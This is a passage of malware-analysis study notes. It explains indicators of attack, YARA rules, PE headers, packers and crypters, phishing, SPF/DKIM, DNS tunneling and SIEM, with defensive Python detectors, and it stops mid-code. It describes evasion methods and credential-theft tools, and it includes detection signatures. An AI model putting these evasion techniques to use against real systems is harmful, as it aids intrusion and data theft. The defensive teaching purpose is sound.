environment (typically used for analysis) and avoids execution in such cases.
- Disabling Security Software: Malware may attempt to disable or tamper with antivirus programs,
firewalls, or other protective measures to avoid detection.
- Fileless Attacks: Attackers avoid writing files to disk by executing malicious code directly in
memory (fileless malware), making detection by traditional file-scanning antivirus tools difficult.

7. Safety Precaution

Safety precautions refer to the steps individuals and organizations can take to protect themselves from
malware, cyberattacks, and other security risks.

Common Safety Precautions:

- Keep Software Updated: Always apply security patches and updates to operating systems,
browsers, and applications to avoid exploitation of known vulnerabilities.
- Use Strong, Unique Passwords: Employ password managers and ensure that passwords are
strong and unique across different accounts. Enable multi-factor authentication (MFA) wherever
possible.
- Backup Important Data: Regularly back up critical data and store it offline or in a secure cloud
environment. This is particularly important to mitigate the impact of ransomware.
- Educate Users on Phishing: Employees and users should be trained to recognize phishing
attempts, avoid suspicious links or attachments, and verify the sender of unexpected emails.
- Install and Maintain Antivirus Software: Keep antivirus and anti-malware software up to date and
ensure it is set to automatically scan files and monitor the system for suspicious behavior.
- Use a Firewall: Employ firewalls to block unauthorized access to systems and networks, and
restrict incoming and outgoing traffic based on predefined security rules.
- Secure Remote Access: Ensure that remote access tools (e.g., VPN, RDP) are properly
secured using encryption, strong passwords, and MFA to prevent unauthorized access.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Indicator of Attack and common possibility for attack indicator
YARA Rules
CAPA
Signature
PE signature value
5A4D
4550
MIME
Packer
Compiler
Crypter

1. Indicator of Attack (IoA) and Common Possibility for Attack Indicators

Indicator of Attack (IoA) refers to any behavioral sign that suggests an ongoing or attempted malicious
activity within a system or network. Unlike Indicators of Compromise (IoCs), which focus on
post-incident evidence (such as specific malware hashes or IP addresses), IoAs focus on the attacker’s
behavior or tactics.

Common IoAs:

- Unusual Network Traffic: High levels of outgoing data, unexpected communication with external
servers, or attempts to access restricted network areas.
- Anomalous File Activity: Unauthorized file modifications, the sudden creation of new files, or
attempts to delete large volumes of data.
- Process Injection: Malicious code injected into legitimate processes to evade detection and
persist within the system.
- Privilege Escalation Attempts: Unauthorized attempts to increase user privileges, allowing
attackers to execute higher-level commands.
- Execution of Known Malicious Tools: Running recognized hacking tools or known malware
executables, like Metasploit or Cobalt Strike beacons.
- Behavioral Anomalies: Actions like disabling antivirus, changing firewall rules, or abnormal user
activity after hours.

Common Possibilities for Attack Indicators:

- Unauthorized Remote Access: Unexpected use of remote desktop services, VPN connections,
or SSH access.
- Credential Dumping: Tools like Mimikatz being used to extract passwords from memory.
- Lateral Movement: Attackers moving between systems on a network, using compromised
credentials or exploiting vulnerabilities.
- Persistence Mechanisms: Registry changes, creation of scheduled tasks, or modification of
startup files to ensure the malware remains on the system after reboot.

2. YARA Rules

YARA (the name is a tongue-in-cheek acronym, "Yet Another Ridiculous Acronym") is a tool designed
to identify and classify malware by creating signatures (rules) that describe patterns found in
malware samples. These rules are used in static analysis to detect specific types of malware or
malicious code across files, executables, or memory, and are the common currency for sharing
detections between analysts and tools.

YARA Rule Structure:

- Meta Section: Describes the rule’s metadata, such as its author, date of creation, and purpose.
- Strings Section: Defines the text, binary, or regular expression patterns the rule will search for in
files or memory dumps.
- Condition Section: Specifies the conditions that must be met for the rule to match. This includes
criteria like whether certain strings must be present or occur in a specific combination.

Example YARA Rule:

```yara
rule ExampleRule
{
    meta:
        author = "John Doe"
        description = "Detects sample malware"
        date = "2024-10-21"

    strings:
        $str1 = "malicious_function"
        $str2 = { 6A 00 68 00 30 00 00 6A 04 68 00 40 00 00 50 }

    condition:
        $str1 or $str2
}
```

This rule searches for a specific text string (`malicious_function`) or a particular sequence of hex
bytes and matches a file if either is found. Hex strings may contain `??` wildcards and `[n-m]`
jumps, and conditions can reference counts (`#str1 > 2`), offsets (`$str2 at 0`) and file
properties such as `filesize < 1MB`, so a rule can be made as loose or as specific as the sample set
requires.
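To make the strings and condition sections concrete, here is an added example (not code from the study material or from the YARA project): a small Python matcher that implements the subset of YARA's hex-string syntax used above plus `??` wildcards and `[n-m]` jumps, and evaluates the page's ExampleRule over constructed buffers. The extra `$str3` pattern and the sample bytes are hypothetical, chosen to show how a wildcard rule still catches a variant whose bytes were altered; real use goes through yara-python (`yara.compile(...)`), which this block only imitates.

```python
import re


def hex_string_to_regex(hex_string: str) -> re.Pattern:
    """Compile a YARA-style hex string into a bytes regex.

    Supports literal bytes ('6A'), single-byte wildcards ('??') and
    jumps ('[2-4]' = two to four arbitrary bytes), the three forms that
    cover most real-world rules.
    """
    parts = []
    for token in hex_string.strip().strip("{}").split():
        if token == "??":
            parts.append(b".")
        elif token.startswith("["):
            lo, hi = token.strip("[]").split("-")
            parts.append(b".{%d,%d}" % (int(lo), int(hi)))
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


# The page's ExampleRule, plus a hypothetical $str3 showing ?? and [n-m] so a
# variant that changed one byte and inserted padding would still match.
EXAMPLE_RULE = {
    "name": "ExampleRule",
    "strings": {
        "$str1": ("text", "malicious_function"),
        "$str2": ("hex", "{ 6A 00 68 00 30 00 00 6A 04 68 00 40 00 00 50 }"),
        "$str3": ("hex", "{ 6A 00 ?? 68 [2-4] 50 }"),
    },
    # condition: $str1 or $str2 or $str3
    "condition": lambda found: bool(found["$str1"] or found["$str2"] or found["$str3"]),
}


def scan(rule: dict, data: bytes):
    """Return (matched, {identifier: [offsets]}) for one rule over one buffer."""
    found = {}
    for ident, (kind, pattern) in rule["strings"].items():
        if kind == "text":
            regex = re.compile(re.escape(pattern.encode()))
        else:
            regex = hex_string_to_regex(pattern)
        found[ident] = [m.start() for m in regex.finditer(data)]
    return rule["condition"](found), found


# Constructed sample buffers (not real malware).
SAMPLE_HIT = (b"\x90" * 8
              + bytes.fromhex("6A 00 68 00 30 00 00 6A 04 68 00 40 00 00 50")
              + b"\x00" * 4 + b"some text mentioning malicious_function here")
SAMPLE_VARIANT = b"\xcc" * 3 + bytes.fromhex("6A 00 41 68 AA BB CC 50")  # only $str3 fits
SAMPLE_CLEAN = b"MZ" + b"\x00" * 64
```

The `found` dictionary is what a YARA condition reasons about: each identifier maps to the offsets where it matched, so `$str1` is true when its list is non-empty, and counts or offset tests are just further checks on the same lists.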

3. CAPA

CAPA is a tool created by FireEye (now Mandiant) for automated analysis of executable files,
specifically focusing on malware. CAPA identifies the capabilities and behaviors of a program by
analyzing its code. It’s particularly useful in identifying what a piece of malware can do without actually
executing it.

Key Features of CAPA:

- Static Analysis: CAPA disassembles the file and matches rules against API calls, strings,
constants and instruction patterns, without running it. PE (Portable Executable) files are the
main target, and ELF, .NET and raw shellcode are also supported.
- Rule-Based: Similar to YARA, CAPA relies on a set of open, human-readable rules that describe
common malware behaviors like file creation, network communication, or process injection; each
rule is tagged with the MITRE ATT&CK technique and Malware Behavior Catalog entry it represents.
- Layered Analysis: Rules are evaluated at file, function and basic-block scope, so a capability
such as "inject code into another process" can require that several API calls appear together in
one function rather than anywhere in the binary.

Example Output of CAPA:

CAPA might identify that a malware sample is capable of:

- Creating/Deleting Files
- Injecting Code into Other Processes
- Making HTTP Requests

4. Signature

A signature in malware analysis is a distinctive pattern or sequence that can be used to identify specific
malware variants or types. Signatures are typically used in traditional antivirus software and intrusion
detection systems (IDS) to detect known malware based on predefined patterns.

Types of Signatures:

- File-Based Signatures: Specific sequences of bytes within a file that are unique to a particular
piece of malware.
- Behavior-Based Signatures: Patterns of system behavior (e.g., attempts to connect to certain IP
addresses or modify specific registry keys) associated with malicious activity.
- Network Signatures: Patterns of network traffic (such as DNS requests or HTTP headers) that
suggest malware communication.

5. PE Signature Value

The Portable Executable (PE) format is used for Windows executables, DLLs and drivers. A PE file is
identified by two fixed signature values. Both are stored little-endian, so the bytes on disk appear
in the reverse order of the hex value usually quoted:

- 5A4D ("MZ"): the DOS header magic (e_magic) at offset 0. On disk the bytes are 4D 5A, the ASCII
string "MZ" (the initials of Mark Zbikowski, who designed the DOS executable format). The value
sometimes written as "54AD" is a transposition of 5A4D and is not a real signature.
- 4550 ("PE"): the start of the NT headers. The 32-bit field at offset 0x3C of the DOS header
(e_lfanew) holds the file offset of the PE signature, which is the four bytes 50 45 00 00
("PE\0\0", IMAGE_NT_SIGNATURE = 0x00004550). The IMAGE_FILE_HEADER (machine type, number of
sections, characteristics) immediately follows, then the optional header and the section table.

Checking both values, and that e_lfanew points inside the file, is the first step of any PE
parser; a crafted file that passes the MZ check but carries a bogus e_lfanew is a classic way to
crash careless tools.
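As an added example (not code from the study material), the following Python parser walks exactly that chain, DOS header to e_lfanew to "PE\0\0" to file header to section table, with bounds checks at each step. The sample image it parses is constructed in the block (a header-only PE, not a runnable binary) and uses the UPX0/UPX1 section names so the section listing also shows the kind of packer fingerprint discussed later on this page.

```python
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ" read as a little-endian 16-bit value
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0" read as a little-endian 32-bit value
E_LFANEW_OFFSET = 0x3C            # where the DOS header stores the PE header offset

MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "ARM64"}


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> e_lfanew -> PE signature -> file header -> section table.

    Raises ValueError rather than trusting any offset a crafted file could
    point outside the buffer.
    """
    if len(data) < 0x40:
        raise ValueError("too short for a DOS header")
    e_magic = struct.unpack_from("<H", data, 0)[0]
    if e_magic != IMAGE_DOS_SIGNATURE:
        raise ValueError("no MZ signature at offset 0")
    e_lfanew = struct.unpack_from("<I", data, E_LFANEW_OFFSET)[0]
    if e_lfanew + 24 > len(data):
        raise ValueError("e_lfanew points outside the file")
    nt_sig = struct.unpack_from("<I", data, e_lfanew)[0]
    if nt_sig != IMAGE_NT_SIGNATURE:
        raise ValueError("no PE\\0\\0 signature at e_lfanew")
    # IMAGE_FILE_HEADER (20 bytes) follows the 4-byte signature.
    machine, nsections, _ts, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sect_table = e_lfanew + 4 + 20 + opt_size
    if sect_table + 40 * nsections > len(data):
        raise ValueError("section table truncated")
    sections = []
    for i in range(nsections):
        name, _vsize, vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, sect_table + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_address": vaddr, "raw_size": raw_size,
                         "raw_ptr": raw_ptr})
    return {
        "e_magic": e_magic, "e_lfanew": e_lfanew, "nt_signature": nt_sig,
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "is_dll": bool(characteristics & 0x2000),
        "sections": sections,
    }


def is_valid_pe(data: bytes) -> bool:
    try:
        parse_pe(data)
        return True
    except ValueError:
        return False


def packer_hint(info: dict):
    """Section names are the cheapest packer fingerprint (UPX0/UPX1 for UPX)."""
    if any(s["name"].startswith("UPX") for s in info["sections"]):
        return "UPX"
    return None


def build_sample_pe() -> bytes:
    """Constructed header-only PE image for the example (not a runnable binary)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, e_lfanew)
    # Machine=i386, 2 sections, no optional header, EXECUTABLE_IMAGE | 32BIT_MACHINE
    file_header = struct.pack("<HHIIIHH", 0x014C, 2, 0, 0, 0, 0, 0x0102)
    sections = b""
    for name, vaddr, raw in ((b"UPX0", 0x1000, 0), (b"UPX1", 0x6000, 0x400)):
        sections += struct.pack("<8sIIIIIIHHI", name, 0x5000, vaddr, 0x400, raw,
                                0, 0, 0, 0, 0xE0000080)
    return bytes(dos) + b"PE\0\0" + file_header + sections
```

The constructed image deliberately has a zero-length optional header, which real files never do, but the parser does not care: it derives every offset from the header fields rather than assuming fixed positions, and that is what keeps it honest on samples whose headers were hand-edited to break tooling.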

6. MIME

MIME (Multipurpose Internet Mail Extensions) is a standard that extends the format of email messages
to support text in character sets other than ASCII, as well as attachments such as images, videos, and
application files.

Uses:

- Email Attachments: MIME allows emails to include multimedia content and attachments, such
as images and executable files, carried as base64-encoded parts of a multipart message body.
- HTTP Responses: In web traffic, MIME types are used to indicate the content type of a file
(e.g., `text/html`, `image/png`, `application/pdf`) through the `Content-Type` header.

MIME-Type Example:

- text/html: Represents an HTML document.
- application/pdf: Represents a PDF document.
- image/jpeg: Represents a JPEG image.

For an analyst the declared MIME type is a claim made by the sender or server, not a property of the
file: an attachment labelled `application/pdf` can carry an executable. Confirm the type from the
file's magic bytes (for example with the `file` command) before trusting the label.

7. Packer

A packer is a tool used to compress or encrypt executable files, reducing their size or obfuscating their
code. Packers are often used by malware authors to make analysis more difficult and to evade
signature-based detection.

How It Works:

- Compression: Packers compress the original code and data of an executable to save space.
Upon execution, the program decompresses itself in memory before running.
- Obfuscation: By modifying the file structure or encrypting sections of the executable, packers
can prevent static analysis tools from easily inspecting the contents of the malware.

Common Packers:

- UPX (Ultimate Packer for Executables): A widely used open-source packer. Its section names
(UPX0, UPX1) give it away, and an unmodified UPX file can be unpacked with `upx -d`; malware
authors often patch the UPX header or stub so that the stock tool fails.
- Themida: A commercial protector that offers more sophisticated protection, including
anti-debugging, code virtualisation and other anti-reverse engineering techniques.

8. Compiler

A compiler is a program that translates high-level programming code (like C or C++) into machine code
or executable binaries. Malware authors use compilers to convert their malicious code into an
executable format that can run on a target system.

Why It’s Important in Malware Analysis:

- Compiler Identification: By identifying which compiler was used to create a malware sample,
analysts can gather clues about its origin or determine if multiple samples were created by the
same attacker. Tools such as Detect It Easy (DIE) match a binary's entry-point bytes and
section layout against signature databases of known compilers and packers.
- Compiler Artifacts: Compilers leave traces or patterns in the binaries they create (e.g., certain
sections, runtime library functions, or the Rich header that Microsoft's linker writes into PE
files with the toolchain versions used), which can be used to identify or classify malware.

9. Crypter

A crypter is a tool used to encrypt or obfuscate malware to prevent detection by antivirus or security
software. The purpose of using a crypter is to make the malware harder to analyze and evade static
detection methods.

How Crypters Work:

- Encryption: Crypters encrypt the original malicious code and bundle it with a decryption routine.
When the malware is executed, it first decrypts itself in memory and then runs the original
malicious payload.
- Polymorphism: Some crypters use polymorphic techniques to change the appearance of the
malware each time it’s encrypted, making it harder for traditional signature-based detection
methods to identify the malware.

Crypter vs. Packer:

- Crypter: Primarily focuses on encrypting malware to evade detection.
- Packer: Compresses the malware to reduce size but may also provide some obfuscation or
anti-analysis features.
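Both packed and crypted sections look alike from the outside: their bytes are nearly uniformly distributed. The following added example (not code from the study material) shows the entropy check most triage tools use to spot them, for both the Packer and the Crypter sections above. The "crypter" is a toy XOR keystream stand-in, not real cryptography, and the sample section contents are constructed; the block also demonstrates the main false negative of the heuristic, single-byte XOR obfuscation, which permutes the byte histogram without changing its entropy at all.

```python
import math
import random
import zlib
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 (constant) to 8.0 (uniform random)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def toy_crypter(payload: bytes, seed: int) -> bytes:
    """XOR the payload with a seeded PRNG keystream: a stand-in for a crypter's
    encryption layer, NOT real cryptography. Applying it twice decrypts."""
    rng = random.Random(seed)
    return bytes(b ^ rng.randrange(256) for b in payload)


def single_byte_xor(payload: bytes, key: int) -> bytes:
    """The cheapest obfuscation seen in the wild: XOR every byte with one key."""
    return bytes(b ^ key for b in payload)


def classify(data: bytes, packed_threshold: float = 7.0) -> str:
    """Crude packer/crypter heuristic of the kind many triage tools apply per section."""
    h = shannon_entropy(data)
    if h >= packed_threshold:
        return "likely packed/encrypted"
    if h >= 6.0:
        return "compressed or mixed"
    return "plain code/data"


# Constructed stand-in for an unpacked section (text has low entropy).
PLAIN_SECTION = b"This program cannot be run in DOS mode. " * 64
PACKED_SECTION = zlib.compress(PLAIN_SECTION, 9)       # what a packer would store
CRYPTED_SECTION = toy_crypter(PLAIN_SECTION, seed=7)    # what a crypter would store
XORED_SECTION = single_byte_xor(PLAIN_SECTION, 0x5A)   # entropy unchanged
```

On a real binary the check is run per section: a tiny `.text` next to a large high-entropy section with executable permissions is the classic packed layout, and the entropy of a single-byte-XOR'd blob matches its plaintext exactly, which is why an analyst also looks at byte frequency (the most common byte XOR'd with 0x00 often recovers the key).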

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Spear Phishing Analysis
SPF & DKIM Records
Phishtank
Zero-Day Attack
DNS Tunneling
Ramnit Banking Trojan
Case Study
Working of SIEM Tool

1. Spear Phishing Analysis

Spear phishing is a targeted phishing attack aimed at specific individuals or organizations, often with
the goal of stealing sensitive information like login credentials or deploying malware. Unlike regular
phishing, spear phishing uses personalized information about the target to make the attack more
convincing.

Spear Phishing Analysis:

1. Attack Vector: Typically begins with an email crafted to appear as though it comes from a
trusted source, such as a colleague or business partner.

2. Indicators of Spear Phishing:

- Urgent Language: Messages that create a sense of urgency, asking for immediate action (e.g.,
transferring money or updating credentials).
- Spoofed Email Address: The sender's display name or address imitates a trusted domain, either
through a look-alike domain or a forged From header on a domain that does not enforce SPF, DKIM
and DMARC.
- Malicious Attachments or Links: These often contain malware or lead to fake websites designed to
capture credentials.

3. How to Detect and Analyze:

- Inspect Headers: Check email headers for inconsistencies between the From address, the
Return-Path and the Received chain, and read the Authentication-Results header for the receiving
server's SPF and DKIM verdicts.
- Analyze Links: Use URL scanning tools to verify the safety of links in emails.
- Check Attachments: Attachments can be analyzed in a sandbox or through static and dynamic malware
analysis tools.

SPF & DKIM Records

SPF (Sender Policy Framework) and DKIM (DomainKeys Identified Mail) are two email authentication
mechanisms that help receivers verify, respectively, that the sending server is authorized for the
domain and that the message content was signed by the domain and not altered in transit. Together
they are what lets a receiver reject or flag spoofed mail.

SPF:

- Purpose: SPF allows domain owners to specify which mail servers are allowed to send emails
on behalf of their domain. When an email is received, the receiving mail server checks the
sender's IP address against the domain's SPF record in DNS.
- SPF Record Example (published as a TXT record on the domain):

v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 include:spf.third-party.com ~all

This record authorizes mail from the 192.0.2.0/24 block and the single host 198.51.100.123,
pulls in whatever spf.third-party.com's own record authorizes (`include:`), and marks every other
sender as a softfail (`~all`); `-all` would be a hard fail. Receivers test the connecting server's
IP against the mechanisms in order and stop at the first match.
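To show how a receiver actually evaluates such a record, here is an added example (not code from the study material) of an SPF checker in Python. It models the `ip4`, `ip6`, `include` and `all` mechanisms and the four qualifiers; `a`, `mx`, `exists` and `ptr` need live DNS and are skipped. The DNS zone is a constructed dictionary using documentation addresses and the made-up domains example.com and spf.third-party.example, so it runs offline.

```python
import ipaddress

# Constructed DNS TXT records for the example (assumed zone, not real domains).
DNS_TXT = {
    "example.com": "v=spf1 ip4:192.0.2.0/24 ip4:198.51.100.123 "
                   "include:spf.third-party.example ~all",
    "spf.third-party.example": "v=spf1 ip4:203.0.113.0/25 ip6:2001:db8:1::/48 -all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_LOOKUPS = 10  # RFC 7208 limit on DNS-querying terms per evaluation


def check_spf(domain: str, sender_ip: str, _lookups: list = None) -> str:
    """Evaluate the SPF record of `domain` for a message from `sender_ip`.

    Returns pass / fail / softfail / neutral / none / permerror. Only ip4,
    ip6, include and all are modelled; a, mx, exists and ptr need live DNS.
    """
    lookups = _lookups if _lookups is not None else []
    record = DNS_TXT.get(domain.lower())
    if record is None or not record.lower().startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"                      # mechanisms default to "+" (pass)
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        mechanism, _, argument = term.partition(":")
        mechanism = mechanism.lower()
        if mechanism == "all":
            matched = True
        elif mechanism in ("ip4", "ip6"):
            # `ip in network` is False across address families, so an IPv6
            # sender never matches an ip4 term and vice versa.
            matched = ip in ipaddress.ip_network(argument, strict=False)
        elif mechanism == "include":
            lookups.append(argument)
            if len(lookups) > MAX_LOOKUPS:
                return "permerror"
            # include matches only when the included record yields "pass";
            # its own fail/softfail does not propagate.
            matched = check_spf(argument, sender_ip, lookups) == "pass"
        else:
            continue  # a/mx/exists/ptr: unsupported in this offline model
        if matched:
            return QUALIFIERS[qualifier]
    return "neutral"  # no mechanism matched and no "all" term
```

Two details trip people up and are visible in the code: an `include` whose record ends in `-all` does not fail the outer evaluation, it simply does not match, so the outer `~all` decides; and the lookup limit is a hard permerror, which is why long include chains (many SaaS senders) break SPF for a domain.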

DKIM:

- Purpose: DKIM adds a digital signature to email headers, allowing the receiving mail server to
verify that the email was not tampered with during transit. The signature is validated using a
public key published in the sender's DNS records.
- How DKIM Works:
- The sender's mail server hashes selected headers and the body, signs the hash with the
domain's private key, and adds the result as a DKIM-Signature header whose `d=` tag names the
domain and `s=` tag names the selector.
- The recipient's mail server fetches the public key from the TXT record at
`<selector>._domainkey.<domain>` and verifies the signature; any change to the signed parts in
transit makes the check fail.

4. Phishtank

Phishtank is a collaborative, community-based platform where users submit and share information
about phishing websites. It is maintained by OpenDNS and helps security professionals identify and
block phishing threats.

How Phishtank Works:

- User Submissions: Anyone can submit suspicious URLs to Phishtank.
- Verification: The community or automated systems verify whether a submitted URL is a phishing
attempt.
- API Integration: Security tools and systems can use the Phishtank API to check whether a URL
is part of a known phishing attack.

Usage:

- Phishtank is widely used to block phishing attempts in real-time by integrating its data into email
filtering systems, firewalls, and web gateways.

5. Zero-Day Attack

A zero-day attack refers to an attack that exploits a previously unknown vulnerability in software or
hardware. Since the vulnerability is unknown to the software vendor, no patch or fix is available at the
time of the attack.

How Zero-Day Attacks Work:

- Discovery: Attackers discover a vulnerability in software, such as in an operating system,
browser, or application.
- Exploitation: The attackers develop an exploit to take advantage of the vulnerability. This could
involve remote code execution, privilege escalation, or bypassing security controls.
- Attack Execution: Attackers launch the attack before the software vendor becomes aware of the
vulnerability or has time to release a patch, hence the term "zero-day."

Prevention:

- Patch Management: A zero-day by definition has no patch, so patching is about shrinking the
attack surface around it: fully patched systems deny attackers the known vulnerabilities they
chain with the new one, and a fast patch process closes the window as soon as the vendor
releases a fix.
- Threat Intelligence: Monitoring threat intelligence feeds can help detect zero-day attacks early.
- Behavioral Analysis: Using tools like EDR (Endpoint Detection and Response) and SIEM
(Security Information and Event Management) to monitor for suspicious behavior that may
indicate a zero-day attack.

6. DNS Tunneling

DNS Tunneling is a method used by attackers to bypass security measures and exfiltrate data from a
network by encoding it within DNS queries and responses. This technique exploits the DNS protocol,
which is typically allowed through firewalls and proxies.

How DNS Tunneling Works:

1. Compromised Host: The attacker infects a device within the target network.
2. DNS Queries: Data is encapsulated within DNS queries sent from the infected host to an
external attacker-controlled DNS server.
3. Data Transfer: The attacker’s DNS server decodes the data from the queries and sends
responses that also contain encoded data. This data can be decoded by the malware on the
compromised host.

Detection:
- Unusual DNS Traffic: High volumes of queries to a single parent domain, many unique subdomains
that are never repeated, long or high-entropy subdomain labels, and heavy use of record types
that carry large payloads (TXT, NULL, CNAME).
- Traffic Analysis: Log DNS queries (resolver logs, or passive DNS from a network sensor) and
baseline them per client and per domain so that abnormal query rates and sizes stand out;
blocking direct outbound port 53 except from the corporate resolvers forces tunnels through a
monitored path.
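The following added example (not code from the study material) turns those detection ideas into a small Python scorer that runs over a constructed query log. Benign lookups go to example.com; the tunnel traffic, generated in the code as hash-derived labels under the made-up domain tunnel.example, has the long, high-entropy, never-repeating prefixes and TXT queries described above. The thresholds are illustrative assumptions to be tuned against your own resolver logs.

```python
import hashlib
import math
from collections import Counter, defaultdict


def label_entropy(s: str) -> float:
    """Shannon entropy (bits per character) of a hostname prefix."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def build_constructed_log() -> list:
    """Constructed DNS query log: (client_ip, qtype, qname). Not real traffic."""
    log = [
        ("10.0.0.5", "A", "www.example.com"),
        ("10.0.0.5", "A", "mail.example.com"),
        ("10.0.0.5", "AAAA", "cdn.example.com"),
        ("10.0.0.5", "A", "api.example.com"),
        ("10.0.0.7", "A", "www.example.com"),
    ]
    # Tunnel traffic: each chunk of exfiltrated data becomes a unique, long,
    # high-entropy prefix under one parent domain, often with TXT queries so
    # the server's reply can carry data back.
    for i in range(12):
        chunk = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:48]
        qname = f"{chunk[:24]}.{chunk[24:]}.tunnel.example"
        log.append(("10.0.0.9", "TXT" if i % 2 else "A", qname))
    return log


def registered_domain(qname: str) -> str:
    """Approximate the registrable domain as the last two labels
    (a real detector uses the Public Suffix List for co.uk and friends)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_tunneling(log, min_unique=8, min_len=20, min_entropy=3.0, txt_ratio=0.25):
    """Score each parent domain; return (domain, reasons) for likely tunnels."""
    by_domain = defaultdict(lambda: {"names": set(), "txt": 0, "total": 0})
    for _client, qtype, qname in log:
        stats = by_domain[registered_domain(qname)]
        stats["total"] += 1
        stats["names"].add(qname)
        if qtype in ("TXT", "NULL", "CNAME"):
            stats["txt"] += 1
    suspects = []
    for domain, s in by_domain.items():
        prefixes = [q[: -len(domain) - 1] for q in s["names"]]  # strip ".parent"
        avg_len = sum(map(len, prefixes)) / len(prefixes)
        avg_ent = sum(map(label_entropy, prefixes)) / len(prefixes)
        reasons = []
        if len(s["names"]) >= min_unique and avg_len >= min_len:
            reasons.append(f"{len(s['names'])} unique names, avg prefix {avg_len:.0f} chars")
        if avg_ent >= min_entropy:
            reasons.append(f"avg prefix entropy {avg_ent:.2f} bits/char")
        if s["txt"] / s["total"] >= txt_ratio:
            reasons.append(f"{s['txt']}/{s['total']} TXT/NULL/CNAME queries")
        if len(reasons) >= 2:  # require two independent signals to cut false positives
            suspects.append((domain, reasons))
    return suspects
```

Requiring two signals matters in practice: CDNs and anti-spam services legitimately generate many unique, hash-like subdomains, and a single-feature rule on entropy alone pages the on-call analyst every night.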

7. Ramnit Banking Trojan

Ramnit is a banking Trojan designed to steal sensitive information, including online banking
credentials, FTP passwords, and session cookies. It first appeared in 2010 as a file-infecting
worm, spreading by infecting executables and HTML files and copying itself to removable drives;
later versions incorporated leaked Zeus source code and added web-injection and credential theft,
and it has also been distributed through phishing emails and compromised websites.

Key Features of Ramnit:

- Credential Theft: Ramnit is capable of capturing login credentials for online banking and other
financial services.
- Session Hijacking: It can hijack browser sessions to bypass two-factor authentication and take
over the victim's active online banking sessions.
- Persistence: Ramnit often employs techniques to maintain persistence on infected systems,
making it difficult to remove.

8. Case Study

A case study in cybersecurity typically involves a detailed examination of a real-world cyber incident or
campaign to understand the attacker’s tactics, techniques, and procedures (TTPs). Case studies help
organizations learn from past events and improve their own security measures.

Components of a Case Study:

- Incident Overview: A description of the attack, including how the breach occurred, what systems
were affected, and what data was compromised.
- Attack Timeline: A timeline of events from the initial compromise to the detection and mitigation
of the attack.
- Response Actions: Steps taken to contain and remediate the attack, such as patching
vulnerabilities, cleaning infected systems, and improving defenses.

Example:

- Target Breach (2013): Attackers used network credentials stolen from a third-party HVAC vendor
to gain entry into Target's network, moved laterally to the point-of-sale systems, and stole about
40 million payment card numbers (and personal data of roughly 70 million customers). The lesson
drawn from it is network segmentation: vendor access should never have reached the card-processing
environment.

9. Working of SIEM Tool

A SIEM (Security Information and Event Management) tool collects, analyzes, and correlates security
logs from across an organization's infrastructure to detect and respond to potential security threats in
real-time.

How SIEM Works:

1. Log Collection: SIEM tools gather logs from various sources, including firewalls, servers,
applications, IDS/IPS, and endpoints.
2. Normalization: The SIEM tool normalizes log data from different formats into a consistent format
that can be analyzed.
3. Correlation: SIEM tools apply correlation rules to identify patterns or sequences of events that
could indicate a security incident.
4. Alerting: When a suspicious pattern is detected, the SIEM generates alerts and notifies security
teams of potential threats.
5. Incident Investigation: Security teams can investigate incidents within the SIEM by reviewing
logs, tracking alerts, and correlating additional information.
6. Reporting and Compliance: SIEM tools provide detailed reports that help organizations meet
regulatory requirements (e.g., PCI DSS, HIPAA).
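Steps 1 to 4 of that pipeline can be shown end to end in a few dozen lines. The following added example (not code from the study material or from any SIEM product) normalises two constructed log sources with different formats, Linux sshd syslog lines and Windows Security events exported as JSON (4625 = failed logon, 4624 = successful logon), into one schema, then applies a correlation rule across both sources: at least five failed logons from one source IP within 60 seconds followed by a successful logon from that IP. The hostnames, addresses and ISO-formatted timestamps are constructed.

```python
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed raw events from two sources (sshd syslog and Windows Security JSON).
RAW_EVENTS = [
    "2024-10-21T10:00:01 bastion sshd[2201]: Failed password for invalid user admin from 203.0.113.9 port 51000 ssh2",
    "2024-10-21T10:00:05 bastion sshd[2201]: Failed password for root from 203.0.113.9 port 51001 ssh2",
    "2024-10-21T10:00:09 bastion sshd[2201]: Failed password for root from 203.0.113.9 port 51002 ssh2",
    "2024-10-21T10:00:13 bastion sshd[2201]: Failed password for jsmith from 203.0.113.9 port 51003 ssh2",
    "2024-10-21T10:00:17 bastion sshd[2201]: Failed password for jsmith from 203.0.113.9 port 51004 ssh2",
    "2024-10-21T10:00:21 bastion sshd[2201]: Failed password for jsmith from 203.0.113.9 port 51005 ssh2",
    '{"TimeCreated": "2024-10-21T10:00:40", "EventID": 4624, "TargetUserName": "jsmith", "IpAddress": "203.0.113.9", "LogonType": 10}',
    "2024-10-21T10:02:00 bastion sshd[2300]: Failed password for alice from 198.51.100.7 port 40000 ssh2",
    "2024-10-21T10:02:30 bastion sshd[2300]: Accepted password for alice from 198.51.100.7 port 40001 ssh2",
]

SSHD_RE = re.compile(
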